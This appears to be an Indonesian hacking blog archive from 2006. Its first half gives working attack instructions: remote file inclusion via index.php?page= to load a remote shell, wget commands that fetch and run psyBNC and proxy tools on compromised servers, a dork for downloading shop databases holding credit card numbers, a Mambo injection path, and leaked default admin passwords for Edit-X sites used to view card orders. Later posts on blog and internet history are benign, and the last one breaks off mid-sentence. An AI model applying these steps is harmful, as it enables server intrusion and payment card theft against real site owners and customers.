Pembahasan PsyBnc tar ada bagiannya sendiri,sabar yah :-P ato kita order shell buat bikin psyBnc.

PsyBnc

PsyBnc adalah salah satu program yang isa ngubungin antara server domain dengan server MiRc sedangkan cara pebikinan PsyBnc banyak banget yang nyediain tutornya seperti di website http://www.hitam-putih.org/. ato kalian lagi males ngbuka website nya?? Ok penulis tulisin cara pembikinan psybnc yang gratisan alias dengan cara nitip File ke domain orang,

Caranya bukin
1. buka google
2. ketik di kotak serachnya index.php?page=
3. setalah nemu website yang ada tulisan index.php?page= seperti http://www.domaincom/index.php?page=jancok hapus tulisan jancok ganti dengan http://we-dhuz.com/tmp/kek.jpg? Jadi www.domain.com/indexphp?page=http://we-dhuz.com/tmp/kek.jpg?
4. setelah itu ada 3 kotak yang keliatan yaitu kotak execute kotak list file dan kotak browse,ketiga kotak ini yang paling banyak fungsinya yaitu kotak execute,
5. ketik dikotak execute
cd /tmp;wget www.one-server.us/psybnc.tar
cd /tmp;tar –zxvf psybnc.tar
cd /tmp/.kin;./bikin ;./fuck;./run contoh
cd /tmp/.kin;./bikin wedus 1234;./run
6. login ke mirc memakai server domain yang udah kita masukin file psybnc tadi caranya kita harus ingat port dan ident yang kita buat,untuk mengganti ident kita bisa diliat di gambar :

semisal yang kita buat portnya 1234 jadi kita login ke mircnya memakai /server www.domain.com 1234,kalo masuk akan keluar kata kata kurang lebih seperti ini
Welcome to psyBnc 2.1
Please choose your password to connect to server use /QUOTE PASS PASSWORD
cotoh /quote pass mamah
Abis itu akan keluar satu window baru lagi isinya command command psybnc,
Dan yang penting kita entar disuruh masukin server yang ada di MirC
Untuk masukin servernya kita ketik /addserver mesra.kl.my.dal.net:6667
Keterangan :
a./addserver = buat masukin server yang ada di mirc
b.mesra.kl.my.dal.net = salah satu server MiRc yang ada di Dalnet
c. 6667 = salah satu port yang disediain oleh MiRc

setelah addsaerver file psybnc tersebut akan otomatis login keserver Mirc yang udah di add tadi,sekarang tinggal join kechannel yang kesukaan kalian,
peringatan:

keunggulan PsyBnc
penulis juga akan memberikan beberapa keunggulan dari file PsyBnc diantaranya:
1. nick kita bisa online trus walaupun kita sudah ga online
2. ada semacam offline messege , jadi ketika kita sudah off trus ada yang mo chat sama kita kita tau tinggal liat aja di offline messegenya
3. ip asli kita ngga keliatan,yang keliatan ip domain yang kita masukin file psybnc.
4. bisa mengganti ip kita dengan kata kata yang kita bikin seperti : saben.emang.orang.terganteng.sedal.net ip yang seperti ini disebut dengan vhost(Virtual hosting) nah kalo pengin ip kita jadi tulisan kaya gitu kita harus udah punya DS(dedicate Server) ato VDS(Virtual Dedicate Server) cara bikinnya gimana?? Masalah pembikinan vhost akan penulis bahas nanti dalam pembahasan pebikinan Vhost.
Itu lah sebagian dari keunggulan psybnc.
2. selain bisa digabungin antara server MiRc dengan server domain MiRc juga bisa di masukin BOT yang biasanya bertugas ngejagain channel,cara ngebuatnya,hamper sama kaya bikin PsyBnc,cuman file nya beda beda, ada bot yang buat game dichannel ada bot yang ngehubungin antara mirc dengan website surat kabar kaya http://www.detik.com/ , tergantung tcl yang kita masukan kedalam file eggdrop nya.

Bersambung,,, cape banget,,,, hueheuheue

Nyari cc di website yang nggunain mall/lobby.asp

2006-12-31T14:37:00.000-08:00

buka google trus tulis di kotak searchnya mall/lobby.asp setelah itu keluar banyak banget website yang berakhiran mall/lobby.asp contoh http://target.com/shop/mall/lobby.asp trus ganti mall/lobby.asp dengan fpdb/shop.mdb jadi http://target.com/shop/fpdb/shop.mdb download filenya buka pake microssoft acsses sama,trus kalo pengin ngeliat daftar ccnya,sama seperti yang memakai shopdbtes,asp liat di table ordernya.
tapi ngga semua web yang nggunain mall/lobby.asp ini bisa didonlot file mdbnya, coz kebanyakan merakadah nge patch(mengunci) file mdbnya, jadi perlu kesabaran dalam mencari cc dengan model yang satu ini.tapi mall/lobby.asp ini ada juga yang daftar ccnya tedapat cvv2nya.
Selamat berjuang,,,,,,,,,,,,,,,,,,,,

NYARI VURN DI SEBUAH WEB APLIKASI PHP

2006-12-31T14:34:00.000-08:00

mencari vurnable disebuah website bukan hal yang mudah, harus punya kesabaran penuh,dan ketelitian,nah kali ini saya mau nulis gimana cara nyari vurn di sebuah website aplikasi php,

saya ambil contoh dari software mambo,cos banyak sekali vurn di software itu,saya ambil contoh di file contact.class.php

yaitu di :

include_once( $mosConfig_absolute_path .'/includes/vcard.class.php' )

letak file itu ada di folder components/com_contact

jadi seumpama mau nyari website yang masih bisa dimasuki php injection caranya gini

buka google : ketik inurl:"com_contact"

trus coba masukin php injectnya

semisal www.target.com/index.php?option=com_contact&bla&amp;bla&bla

menjadi : www.target.com/components/com_contact/contact.class.php?mosConfig_absolute_path=shell

vurn web aplikasi php semuanya ada di depan include ,include_once , require , require_once dan ada tanda $ sebelum keterangan selanjutnya seperti contoh diatas.

biki http proxy

2006-12-31T14:30:00.000-08:00

1. untuk shell inject yang permission directorynya Yes.
a. wget http://one-server.us/xpl/proxy.tgz
b. tar -zxvf proxy.tgz
c. cd /pro;./xh -s ./httpd ./prox -a -d -p7212
udah kalo keluar pidnya berarti sukses kalo nda berarti anda kurang beruntung hehe
2. untuk shell inject yang permission directorynya No
a. cd /tmp;wget http://one-server.us/xpl/proxy.tgz
b. cd /tmp;tar -zxvf proxy.tgz
c. cd /tmp;./xh -s ./httpd ./prox -a -d -p7212
sama seperti yang permission directorynya Yes trus port yang digunakan berapa??
untuk portnya dapat dilihat di depan -p terserah mau bikin port berapa, hehe

admin login buat editx

2006-12-27T11:15:00.000-08:00

setelah gw cari target dari edit-x satu persatu ternyata ada kelemahan lain di web itu,selain memakai inject juga bisa tanpa memakai inject,

coba ente semua buka gugel www.google.com trus ketik "powered by edit-x" nah ada 4 page kalo ga 5 page lah,

buat contoh nih yeh

http://beastropicaldesign.com

nah web ini kalo dicari kelemahannya pake iinjection ga bakalan bisa,uda dipatch ama adminnya,nih kalo ga caya buka webnya

http://beastropicaldesign.com/editx/add_ad...na.org/item.txt?

bisa ga pel??

ga bisa kan?

nah trus gimana caranya?

kekekekeke

go to the game now!!!

setelah perjalanan mencari meneliti dan mengamati softwer ini,ternyata semua website yang memakai software edit-x ini ditaruh username ama password dari website www.edit-x.com/editx yaitu :

stacy : p3ps105
admin : editx123
admin : Nd1g2006
stacy : Nd1g2006
linda : sunset
linda : Suns3t2006

gobloke puol!!! wakakakaka

kalo ga caya coba aja login ke website yang ga bisa pake inject,kaya web diatas tadi

udah dulu sebenernya masih ada satu lagi kelemahannya,cuman kalo gw beberin tar abis dah supadmin sisaya kekekekeke

trus liat nomer ccnya dimana um?

santi

setelah masuk adminnya mousenya arahin ke menu ADMIN---> reports ---> orders siyap deh

met mencobah

TENTANG BLOG

2006-12-27T10:45:00.000-08:00

Tulisan ini mencoba menerangkan apa itu Blog / Weblog dari berbagai sudut. Walo sebenernya di awal tidak ditulis untuk dibaca di layar komputer (karenanya terlalu panjang untuk konsumsi online) tapi mudah-mudahan tulisan ini bisa dinikmati juga, atau kalo gak, di print aja :)
Binatang Yang Bernama BLOG
Kamu ada di depan komputer, modem sudah terpasang dan siap menjelajah Internet, website apa yang sedang menarik sekarang? Apa yang sedang “trend” di Internet? Link-link apa saja yang menarik? Jangan kuatir, ada banyak Blog di luar sana yang bisa memandu kamu, dan ada cukup banyak detil-detil dan komentar pribadi yang bisa kamu nikmati dari tiap Blogger. Lewat Blog mereka, Blogger telah meraih pemirsa setia dan memperkenalkan kehidupan pribadi mereka pada kita semua.
Apa tuh Blog?
Blog adalah kependekan dari Weblog, istilah yang pertama kali digunakan oleh Jorn Barger pada bulan Desember 1997. Jorn Barger menggunakan istilah Weblog untuk menyebut kelompok website pribadi yang selalu diupdate secara kontinyu dan berisi link-link ke website lain yang mereka anggap menarik disertai dengan komentar-komentar mereka sendiri.
Blog kemudian berkembang mencari bentuk sesuai dengan kemauan para pembuatnya atau para Blogger. Blog yang pada mulanya merupakan “catatan perjalanan” seseorang di Internet, yaitu link ke website yang dikunjungi dan dianggap menarik, kemudian menjadi jauh lebih menarik daripada sebuah daftar link. Hal ini disebabkan karena para Blogger biasanya juga tidak lupa menyematkan komentar-komentar “cerdas” mereka, pendapat-pendapat pribadi dan bahkan mengekspresikan sarkasme mereka pada link yang mereka buat.
Dari komentar-komentar tadi biasanya Blog kemudian menjadi jendela yang memungkinkan kita “mengintip” isi kepala dan kehidupan sehari-hari dari penciptanya. Blog adalah cara mudah untuk mengenal kepribadian seseorang Blogger. Topik-topik apa yang dia sukai dan tidak dia sukai, apa yang dia pikirkan terhadap link-link yang dia pilih, apa tanggapannya pada suatu isu. Seluruhnya biasanya tergambar jelas dari Blog-nya. Karena itu Blog bersifat sangat personal. Roger Yim, seorang kolumnis San Francisco Gate pada artikelnya di Februari 2001, menuliskan bahwa sebuah Blog adalah persilangan antara diary seseorang dan daftar link di Internet. Sedang Scott Rosenberg dalam kolomnya di majalah online Salon pada May 1999 menyimpulkan bahwa Blog berada pada batasan website yang lebih bernyawa daripada sekedar kumpulan link tapi kurang instrospektif dari sekedar sebuah diary yang disimpan di internet.
Perkembangan lain dari Blog yaitu ketika kemudian Blog bahkan tidak lagi memuat link-link tapi hanya berupa tulisan tentang apa yang seorang Blogger pikirkan, rasakan, hingga apa yang dia lakukan sehari-hari. Blog kemudian juga menjadi Diary Online yang berada di Internet. Satu-satunya hal yang membedakan Blog dari Diary atau Jurnal yang biasa kita miliki adalah bahwa Blog dibuat untuk dibaca orang lain. Para Blogger dengan sengaja mendesain Blog-nya dan isinya untuk dinikmati orang lain.
Sejarah Blog
Blog pertama kemungkinan besar adalah halaman What’s New pada browser Mosaic yang dibuat oleh Marc Andersen pada tahun 1993. Kalau kita masih ingat, Mosaic adalah browser pertama sebelum adanya Internet Explorer bahkan sebelum Nestcape. Kemudian pada Januari 1994 Justin Hall memulai website pribadinya Justin’s Home Page yang kemudian berubah menjadi Links from the Underground yang mungkin dapat disebut sebagai Blog pertama seperti yang kita kenal sekarang.
Hingga pada tahun 1998, jumlah Blog yang ada diluar sana belumlah seberapa. Hal ini disebabkan karena saat itu diperlukan keahlian dan pengetahuan khusus tentang pembuatan website, HTML, dan web hosting untuk membuat Blog, sehingga hanya mereka yang berkecimpung di bidang Internet, System Administrator atau Web Designer yang kemudian pada waktu luangnya menciptakan Blog-Blog mereka sendiri.
Pada Agustus 1999 sebuah perusahaan Silicon Valley bernama Pyra Lab meluncurkan layanan Blogger.com yang memungkinkan siapapun dengan pengetahuan dasar tentang HTML dapat menciptakan Blog-nya sendiri secara online dan gratis. Walaupun sebelum itu (Juli 1999) layanan membuat Blog online dan gratis yaitu Pitas telah ada dan telah membuat Blogger bertambah hingga ratusan, tapi jumlah Blog tidak pernah bertambah banyak begitu rupa sehingga Blogger.com muncul di dunia per-blog-an. Blogger.com sendiri saat ini telah memiliki hingga 100.000 Blogger yang menggunakan layanan mereka dengan pertumbuhan jumlah sekitar 20% per bulan. Blogger.com dan Pitas tentu tidak sendirian, layanan pembuat blog online diberikan pula oleh Grouksoup, Edit this Page dan juga Velocinews.
Sejak saat itu Blog kian hari kian bertambah hingga makin sulit untuk mengikutinya. Eatonweb Portal adalah salah satu daftar Blog terlengkap yang kini ada diantara daftar Blog lainnya. Ribuan Blog kemudian bermunculan dan masing-masing memilih topik bahasannya sendiri, dimulai dari bagaimana menjadi orang tua yang baik, hobi menonton film, topik politik, kesehatan, sex, olahraga, buku komik dan macam-macam lagi. Bahkan Blogger ada Blog tentang barang-barang aneh yang dijual di situs lelang Ebay yang bernama Who Would By That?. Cameron Barret menulis pada Blog-nya essay berjudul Anatomy of a Weblog yang menerangkan tema dari Blog. “Blog seringkali sangat terfokus pada sebuah subjek unik yaitu sebuah topik dasar dan/atau sebuah konsep yang menyatukan tema-tema dalam Blog tersebut.” Secara sederhana topik sebuah Blog adalah daerah kekuasan si Blogger-nya tanpa ada editor atau boss yang ikut campur, tema segila apapun biasanya dapat kita temukan sejalan dengan makin bermunculannya Blog di Internet. Dan ya, ide itu telah terpikirkan, Blogger bahkan sekarang telah membuat Blog dari Blog, dan bahkan Blog dari Blog dari Blog.
Dari sedemikian banyak Blog yang ada, Blog-Blog yang menetapkan standar dari Blog dan terkenal sehingga memiliki penggemarnya sendiri diantaranya adalah Blog milik Jorn Barger, Robot Wisdom yang disebut-sebut merupakan Blog terbesar dan paling berguna dimana dia setiap harinya menyodorkan sekian banyak link yang dibentuk dari ketertarikannya pada seni dan teknologi. Camworld adalah Blog populer milik Cameron Barret seorang Desainer Interaktif dimana dia mengkatagorikan topik-topik Blog-nya pada katagori, Random Thoughts, Web Design dan New Media. Camworld dapat disebut sebagai Blog klasik dalam arti Blog tersebut mengandung dosis tepat dari karakter dan opini pribadi dicampur dengan keselektifan pemilihan link-nya.
Blog terkenal lainnya diantaranya, “Obscure Store”http://www.obscurestore.com/ milik Jim Romenesko yang menyediakan link bertemakan berita dan gosip serta hal-hal kecil yang sedikit mengarah pada underground movement, Lawrence Lee juga setiap hari mengupdate Blog-nya, Tomalak’s Realm dengan link-link pada berita tentang Web Design dan Net Business. Memepool dengan pilihan koleksi link-nya yang unik disertai analisis cerdas juga digemari sebagai Blog yang istimewa. Kottke.org merupakan Blog menarik milik Jason Kottke seorang Web Designer yang tinggal di San Francisco, di Blog-nya dia menulis bahwa Blog-nya tersebut adalah caranya mengisi waktu luang untuk menyusun kembali tulisan-tulisan, desain-desain dan critical skill-nya. Tak lupa juga Blog milik Dave Winer, Scripting News, salah satu Blog pertama yang banyak memberikan link tentang pemrograman.
Blogger
Siapa sih para Blogger di Internet ini? Rebecca Blood pada Blog-nya Rebecca’s Pocket mengatakan bahwa para Blogger mulanya adalah mereka yang telah mengajarkan diri mereka sendiri HTML karena mereka menyenanginya, atau mereka yang setelah seharian bekerja di kantor dot.com mereka, dan kemudian menyisakan waktu luang beberapa jam setiap harinya untuk melakukan web surfing dan memasang hasilnya pada Blog mereka. Mereka adalah apa yang ia sebut orang-orang yang antusias pada web. “These were web enthusiast.” tulisnya. Evan Williams, pendiri Blogger.com berpendapat, “Mayoritas Blogger adalah anak-anak muda atau mahasiswa. Dan banyak diantara mereka yang menggunakannya untuk berkomunikasi dengan teman-temannya.”.
Setiap orang tentu saja dapat membuat Blog-nya masing-masing, tapi seperti yang dikatakan Evan, Blogger saat ini kebanyakan terdiri dari para penulis diary muda yang dinamis, offbeat dan punya opini untuk segala hal. Dalam kata lain mereka adalah generasi yang tidak takut berpendapat dan mengungkapkan pendapat mereka.
Lalu apa gunanya membuat Blog? Apa yang mungkin didapatkan oleh seorang Blogger dalam usaha mengurus Blognya? Rabecca Blood menulis bahwa setelah ia membuat Blog-nya ada dua efek samping yang terjadi yang tidak ia perkirakan sebelumnya. Pertama ia menemukan kembali minatnya semenjak ia mulai membuat Blog. Dan hal kedua yang lebih penting, ia mulai lebih menghargai cara pandangnya sendiri.
Ketika setiap harinya ia mengupdate Blog-nya ia mulai mempertimbangkan opini dan ide-idenya dengan lebih hati-hati dan ia mulai merasakan bahwa perspektifnya adalah unik dan penting untuk disuarakan.
Ketika seorang blogger menuliskan apa yang ada di pikirannya, maka ia akan sering berkonfrontasi dengan pikiran-pikiran dan opininya sendiri. Menulis Blog, atau Blogging, setiap hari akan membuat Blogger menjadi penulis yang lebih percaya diri. Dengan terbiasa mengekspresikan pikirannya pada Blog-nya, seorang Blogger dapat dengan lebih baik mengartikulasikan opininya. Blog bahkan dapat menjadi semacam terapi jiwa.
Tentu saja tidak semua orang adalah seorang Natural-Born Blogger dan dapat memproduksi Blog yang menarik. Di luar sana ada banyak Blogger yang merasa perlu mendokumentasikan diri setiap kali ia bersin, atau anak-anak muda yang menuliskan “Saya bosan” atau “School Sucks!” setiap tiga jam sekali. Amy Jo Kim seorang konsultan dan pengarang buku “Community Building on the Web: Secret Strategies for Succesful Online Communities”, menulis bahwa diperlukan beberapa syarat dasar khusus untuk menjadi seorang Blogger, yaitu kemampuan untuk mengekspresikan diri, keinginan untuk berkomunikasi dengan orang banyak dan minat pribadi pada “keterusterangan”.
Blog dengan caranya sendiri sepertinya membuat hidup, pikiran, opini dan kegiatan Bloggernya lebih mempunyai tujuan dan lebih teratur.
Komunitas Blog dan Budaya Digital
Sejalan dengan kepribadian sebuah Blog, si Blogger atau editor dari sebuah Blog biasanya menerima pula kontribusi-kontribusi link unik dari para penikmat Blog-nya. Beberapa website Blog juga menerima feedback terhadap opini dan komentar dari link suatu artikel atau suatu isu yang dimuat. Blog karenanya pula bersifat interaktif dan membentuk komunitas-komunitas para Blogger yang saling me-link-kan Blog mereka satu sama lain.
Para Blogger diwakili oleh Blog mereka mengekspresikan persahabatan, permusuhan dan seringkali melakukan perdebatan yang mereka muat dalam Blog mereka masing-masing yang kemudian mereka link-an pada opini awal yang mereka komentari. Sebuah percakapan dapat berkembang antara 3 hingga 4 Blog sekaligus sambil merujuk pada jawaban mereka di Blog lain. Kelompok pemujaan pada pribadi Blog tertentu bermunculan, beberapa nama Blogger muncul dan muncul kembali pada update harian Blog seseorang yang diidolakannya, atau nama tersebut muncul pada daftar Blog lainnya yang Blogger itu ikuti.
Blog adalah budaya digital tersendiri dan komunitas elektroniknya bertebaran di internet dan dengan sedemikian banyak Blog di Internet yang selalu mencari website-website yang menarik maka Blog menjadi unik. Seperti yang dituliskan Cameron Barret bahwa Blog saat ini adalah indikator akurat tentang apa yang sedang terjadi di Internet dan di dalam komunitas web. “Blog adalah simbol dari apa yang hebat tentang Internet.” tulisnya.
Keinteraktifan adalah hal lain yang didapatkan dari Blog. Internet bukan saja memungkinkan para Blogger memberikan opini dan komentar mereka tentang suatu isu, tapi juga memungkinkan para pembaca Blog menuliskan opininya pula tentang opini yang ia baca. Pro, kontra, link, tambahan informasi, fakta baru, semuanya kemudian terkandung dalam satu situs Blog besar. Jon Katz dalam tulisannya di Slashdot, Here Come The Weblog, May 1999, menggambarkan Blog sebagai rangkaian evolusi menuju “New Media”. Blog berhasil mendemostrasikan banyak hal tentang budaya interaktif yang disukai orang, terutama anak-anak muda, tulisnya.
Salah satu Blog yang terkenal keinteraktifannya adalah Slashdot yang terkenal dengan semboyannya “News for Nerds. Stuff that Matters” yang dikelola oleh beberapa moderator. Di Slashdot satu opini menghasilkan sekian banyak lagi komentar pro atau kontra yang didukung dengan link yang mereka kontribusikan.
Salah satu Community Blog yang perlu dikunjungi pula adalah MetaFilter. Jika banyak Blog lebih bersifat personal, dikendalikan dan ditulis oleh satu orang, atau mencerminkan pribadi satu seseorang, maka katagori Community Blog, seperti MetaFilter hidup dari kontribusi banyak orang dimana setiap harinya para blogger ini sama-sama mengisi MetaFilter dengan link-link mereka dimana mereka menuliskan komentar-komentar mereka pula di dalamnya. Saat ini ada 13511 anggota aktif di MetaFilter, dimana setiap link yang didonasikan ke MetaFilter tentu saja kemudian bisa dikomentari oleh blogger lainnya lagi. Interaksi adalah salah satu daya tarik kuat dari Blog.
Keinteraktifan Blog adalah salah satu faktor yang menunjang kepopulerannya. Media konvensional yang bersifat satu arah berubah bentuk menjadi tempat dimana suara semua orang mendapat tempat, walau belum tentu berharga. Blog memiliki kebalikan struktur dari media konvensional yang bersifat top-down, membosankan dan arogan, kata Jon Katz. Blog juga adalah contoh tepat evolusi komunitas eleltronik dan kemampuan orang yang secara online membuat media yang mereka kostumisasi sendiri, Jon Katz meneruskan. Media yang dikustomisasi sendiri yang dimaksud, adalah media yang lepas dari kecurigaan media sebagai corong korporasi besar. Blog kemungkinan besar adalah masa depan media yang kita saksikan sekarang.
Cameron Barret mengatakan hal yang sama, bahwa “Big Idea” dari Internet adalah kekuatan informasi yang terdistribusi dan jurnalisme gaya Blog adalah jurnalisme media online dalam tingkat yang lebih tinggi. Rebecca Blood menulis: Dengan komentar-komentar tak kenal takut dan sarkasme mereka Blogger mengingatkan kita betapa seringkali media konvensional terinfeksi oleh vested-interest dalam membuat berita.
Blog dengan kecenderungannya memilih-milih berita dan artikel serta website sesuai dengan preference personal Blogger-nya, membuat seolah The Web telah di-_filter_, The Web telah dijelajahi terdahulu (_pre-surfed_) oleh para Blogger dan kita tinggal menikmati apa yang telah disediakan para Blogger pada Blog yang kita sukai. Para Blogger memilihkan link pada website dan berita yang paling aneh, paling bodoh, hingga paling lengkap atau tidak lengkap dari Web. Jon Katz menyebut Blog, Filtered News. Blog sebagai saringan The Web telah menyelamatkan kita dari kekacauan atau kesentralan informasi online yang sekarang terjadi di Internet.
Scott Rosenberg dalam kolomnya di Salon menuliskan pendapatnya tentang Blog dan para Blogger. Blogger, tulisnya, telah menemukan ceruk (_niche_) baru yang subur dalam lingkungan informasi Web. Mereka memenuhi ramalan para visionaris internet terhadap munculnya jenis baru para jurnalis online, tetapi bedanya daripada mencari berita di dunia nyata, mereka menyiangi internet untuk mendapatkan berita.
Blogger menurut sifat dasarnya bukanlah reporter, mereka berperan sebagai editor dalam Blognya masing-masing dan dalam sebuah dunia dengan budaya media yang telah jenuh, Blog menjadi suara-suara alternatif yang menyuarakan bunyi independen dalam setiap ulasannya. Blog bukanlah obat mujarab untuk budaya yang telah jenuh dengan media, tapi mudah-mudahan Blog adalah salah satu peredanya tulis Rabecca Blood.
Memiliki Blog sendiri dan Blog Indonesia
Cara paling direkomendasikan untuk memiliki Blog sendiri adalah dengan mendaftarkan diri kamu di Blogger.com, belajar sedikit tutorial HTML dasar dan Here you go! Kamu sudah memiliki Blog kamu sendiri. Blogger.com tidak membatasi jumlah Blog yang bisa kamu miliki, tidak membatasi kapasitas panjang dari Blog kamu. Kamu bisa memilih desain interface Blog kamu dari template yang telah disediakan, atau jika kamu sudah menguasai HTML kamu bisa merancangnya sendiri atau memodifikasinya. Blog kamu bisa ditempatkan dilayanan website gratis seperti Tripod atau Geocities atau bisa juga ditempatkan di server yang disediakan Blogger.com.
Kamu juga bisa mendapatkan tutorial-tutorial dan bertanya tentang Blog pada forum diskusi yang disediakan oleh Blogger.com. Cara mengisi Blog kamu adalah dengan masuk ke Blogger.com dan menuliskan di area yang sudah disediakan, atau menggunakan fasilitas yang diberikan oleh Blogger.com, dimana dengan satu klik kamu dapat membuat link ke website yang sedang kamu lihat dan kamu dapat memasukkan komentar kamu. Tapi yang paling penting tentu siapkan diri kamu buat mengorganisir lagi opini dan pendapat-pendapat kamu dan latih otot kritis yang kamu miliki.
Apa yang membuat suatu komentar adalah komentar yang bagus? Weblog Resource memberikan beberapa tips. Secara ideal, komentar kamu perlu menjelaskan tentang link yang kamu buat dan kenapa kamu memasang link tersebut. Sebuah komentar tidak cukup hanya berkata link ini cool misalnya, komentar seperti ini tidak berguna buat pengunjung Blog kamu. Tips singkat yang paling berguna? Jadilah diri kamu sendiri, dan mulailah menulisi Blog yang kamu miliki.
Apa ada para Blogger indonesia? Yap.. Website yang mendaftar para Blogger Indonesia yaitu Indo.Blogs. Kriteria satu-satunya agar Blog kamu terdaftar pada Indo.Blogs hanyalah berkebangsaan Indonesia, tanpa memandang secara geografis lokasi kamu berada.
Indo.Blogs mendaftar sekitar 40-an Blog yang ada, keseluruhan secara kasar ada sekitar 100-an Blogger Indonesia dengan personalitinya masing-masing. Kebanyakan mahasiswa atau berprofesi di bidang IT dan Web Desain. Ada yang keseluruhan memakai Bahasa Inggris sebagian lagi memakai Bahasa Indonesia dan sebagian lagi mencampur bahasa yang digunakan. Sayangnya banyak juga yang tidak terupdate setiap hari. Jarak antara satu update dengan yang lain bisa satu bulan lamanya dan kebanyakan lebih berupa jurnal pribadi daripada Blog yang banyak memuat link. Tapi kebanyakan memiliki desain Blog yang menarik dan sederhana, dan Blogger Indonesia tidak lupa mencantumkan sahabat-sahabat Blog mereka dengan rapih seperti yang biasa dilakukan oleh Blogger luar negri.
Lalu apakah ada Community Blog Indonesia? Yupe ada. Silahkan arahkah browser kita ke MSN.OR.ID. Para Blogger disini disebut “celetukers” karena sifatnya dimana masing-masing Blogger memang menyeletukan sesuatu yang kemudian mengisi website ini.
Saat ini ada 64 celetukers dengan masing-masing link ke Blog mereka. Website ini bermula dari mereka yg dulu sering chatting di server microsoft comic chat (irc.msn.com) dan setelah server tersebut kemudian ditutup, maka para penghuninya kemudian mendirikan website ini.
Lebih jauh lagi tentang Komunitas Blogger di Indonesia? Berarti kamu harus gabung sama mailing listnya. Bloggerians adalah mailing list diskusi terbuka untuk komunitas para Blogger Indonesia yang terbentuk sejak bulan Maret 2001 dan saat ini dianggotai oleh 45 anggota.
Mayoritas Blogger Indonesia masih berasal dari kalangan website desainer atau system administrator, atau mereka yang pekerjaannya memang membuat mereka akrab dengan dunia membuat website. Walau begitu, diskusi menarik sering pula terjadi disitu.
Generasi Kedua
Pada tulisannya di Star Telegram, Frances Katz (ada hubungan dengan Jon Katz?) menulis bahwa Blog adalah generasi kedua dari Home Page Pribadi. Perbedaan utama antara Home Page Pribadi dan Blog yaitu, Home Page Pribadi adalah tempat dimana kamu menempatkan foto keluarga, foto kamu dan kemudian mendistribusikan informasi pada lingkaran kecil teman-teman dan keluarga. Sedang Blog dirancang untuk “pengunjung”. Blog memiliki suara spesifik dan kepribadian. Blog karenanya adalah kepanjangan interaktif dari pembuatnya.
Apakah Blog memang suara murni media baru seperti yang diramalkan? Atau hanya sekedar trend digital? Dan akan bertahan lamakah Blog-Blog di Internet? Tentu saja ini jawaban yang perlu dijawab oleh para Blogger sendiri. Banyak orang saat ini memiliki idealisme terhadap Blog sebagai sebuah konsep desentralisasi informasi yang mengembalikan berita kembali di tangan para penggunanya dan tidak dimonopoli lagi oleh korporasi besar atau perusahaan media. Tentu saja masih sekian tahun lagi kita melihat apakah konsep yang bermula dari budaya dan komunitas ini bisa terjadi atau tidak. Kritik terhadap ledakan jumlah Blog yang sekarang terjadi pun sudah banyak disuarakan. Berapa murni lagi suara Blog bisa bertahan? Perdebatan tentang hal ini terus terjadi di Web. Untuk saat ini, buat kamu yang berminat hanya satu saran, BLOG ON!
Sumber sejarah Blog dapat dibaca di:
An Incomplete Annotated History of Weblogs Weblogs a history and perspective FAQ Weblog resources
Enda NasutionCopywriter dan Pemilik dan Penikmat BlogGO BLOG adalah Blog milik Enda yang di updatenya hampir setiap hari.
Post script 02/20/2004Sejak tulisan ini dibuat sekitar akhir 2001 sudah tentu terjadi banyak perubahan di dunia Blog. Makin banyak blogger baru bermunculan dan berhilangan, layanan blogging di Internet muncul dan tenggelam. Blogger.com telah di beli oleh Google dan banyak lagi.
Walau sifat link-linknya yang tidak lagi updated tapi mudah-mudahan tulisan ini masih bisa digunakan sebagai referensi asal muasal dari blog.

SEJARAH INTERNET

2006-12-27T10:37:00.000-08:00

Sejarah internet dimulai pada 1969 ketika Departemen Pertahanan Amerika memutuskan untuk mengadakan riset tentang bagaimana caranya menghubungkan sejumlah komputer sehingga membentuk jaringan organik. Program riset ini dikenal dengan nama ARPANET. Pada 1970, sudah lebih dari 10 komputer yang berhasil dihubungkan satu sama lain sehingga mereka bisa saling berkomunikasi dan membentuk sebuah jaringan. Tahun 1972, Roy Tomlinson berhasil menyempurnakan program e-mail yang ia ciptakan setahun yang lalu untuk ARPANET. Program e-mail ini begitu mudah, sehingga langsung menjadi populer. Pada tahun yang sama, icon @ juga diperkenalkan sebagai lambang penting yang menunjukan "at" atau "pada". Tahun 1973, jaringan komputer ARPANET mulai dikembangkan meluas ke luar Amerika Serikat. Komputer University College di London merupakan komputer pertama yang ada di luar Amerika yang menjadi anggota jaringan Arpanet. Pada tahun yang sama, dua orang ahli komputer yakni Vinton Cerf dan Bob Kahn mempresentasikan sebuah gagasan yang lebih besar, yang menjadi cikal bakal pemikiran internet. Ide ini dipresentasikan untuk pertama kalinya di Universitas Sussex. Hari bersejarah berikutnya adalah tanggal 26 Maret 1976, ketika Ratu Inggris berhasil mengirimkan e-mail dari Royal Signals and Radar Establishment di Malvern. Setahun kemudian, sudah lebih dari 100 komputer yang bergabung di ARPANET membentuk sebuah jaringan atau network. Pada 1979, Tom Truscott, Jim Ellis dan Steve Bellovin, menciptakan newsgroups pertama yang diberi nama USENET. Tahun 1981 France Telecom menciptakan gebrakan dengan meluncurkan telpon televisi pertama, di mana orang bisa saling menelpon sambil berhubungan dengan video link. Karena komputer yang membentuk jaringan semakin hari semakin banyak, maka dibutuhkan sebuah protokol resmi yang diakui oleh semua jaringan. Pada tahun 1982 dibentuk Transmission Control Protocol atau TCP dan Internet Protocol atau IP yang kini kita kenal semua. Sementara itu di Eropa muncul jaringan komputer tandingan yang dikenal dengan Eunet, yang menyediakan jasa jaringan komputer di negara-negara Belanda, Inggris, Denmark dan Swedia. Jaringan Eunet menyediakan jasa e-mail dan newsgroup USENET. Untuk menyeragamkan alamat di jaringan komputer yang ada, maka pada tahun 1984 diperkenalkan sistem nama domain, yang kini kita kenal dengan DNS atau Domain Name System. Komputer yang tersambung dengan jaringan yang ada sudah melebihi 1000 komputer lebih. Setahun kemudian alamat anggota jaringan mulai menggunakan alamat dengan akhiran .com.. Sistem alamat yang serba praktis ini langsung menggelumbungkan jumlah komputer yang tersambung dengan jaringan. Pada 1987 jumlah komputer yang tersambung ke jaringan melonjak 10 kali lipat menjadi 10.000 lebih. Tahun 1988, antar sesama komputer sudah mulai dapat mengobrol atau chatting, karena Jarko Oikarinen dari Finland berhasil menemukan dan sekaligus memperkenalkan IRC atau Internet Relay Chat. Setahun kemudian, jumlah komputer yang saling berhubungan kembali melonjak 10 kali lipat dalam setahun. Tak kurang dari 100.000 komputer kini membentuk sebuah jaringan. Tahun 1990 adalah tahun yang paling bersejarah, ketika Tim Berners Lee menemukan program editor dan browser yang bisa menjelajah antara satu komputer dengan komputer lainnya, yang membentuk jaringan itu. Program inilah yang disebut www, atau World Wide Web. Tahun 1992, komputer yang saling tersambung membentuk jaringan sudah melampaui sejuta komputer, dan di tahun yang sama 